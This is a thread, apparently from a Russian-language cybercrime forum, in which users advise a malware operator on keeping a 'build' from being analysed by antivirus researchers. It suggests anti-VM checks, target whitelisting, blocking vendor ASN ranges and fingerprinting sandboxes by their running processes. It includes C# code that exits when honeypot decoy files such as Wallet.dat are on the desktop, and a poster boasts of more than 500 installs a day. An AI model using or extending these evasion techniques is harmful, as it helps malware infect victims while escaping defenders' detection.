del
Последнее редактирование:
-
XSS.stack #1 – первый литературный журнал от юзеров форума
del
- Автор темы n1ppyyyy
- Дата начала
антивм сделай, чтобы твой билд не работал у аверов
Не всегда это будут виртуальные машины, либо они могут быть настроенными таким образом, чтобы скрыть, что они виртуальные. Я думаю, что, если знаешь свои цели, то можно их отсеить по белому списку (ip-адреса или их диапазон, имена пользователей, имена компьютеров, наличие какого-то специфического софта и тд).
Попробуй узнать какому ASN принадлежат айпишники этих ботов. А дальше можешь попробовать заблочить весь рендж адресов которые входят в эту ASN.
АнтиВМ не всегда работает согласен.
Я на шарпе сделал такое:
C#:
if (File.Exists(HelpStatic.desktop + "\\Passwords.txt"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\Password.txt"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\db.sql"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\Wallet.dat"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\qualityroot.rtf"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\lightagainst.rtf"))
{
Environment.Exit(0);
}Если на раб. столе обнаружен 1 из файлов то завершаю работу. Может это и дико и я теряю часть норм трафика, но помогает. Когда у тебя более 500 инсталов в сутки это замечаешь.
Эти файлы почти всегда лежат на раб. столе аверов. В здравом уме такое не кто так не хранит.
А это хрень. Пытался я блочить IP, там диапазонов не меренно.
Держать на рабочем столе wallet.dat - это конечно забавно. Плюс можно посмотреть, например, запущенные процессы, часто бывает, что в ханипотах или сендбоксах запущено с десяток разных браузеров, какие то мессенджеры разные, клиенты для криптовалют и тд.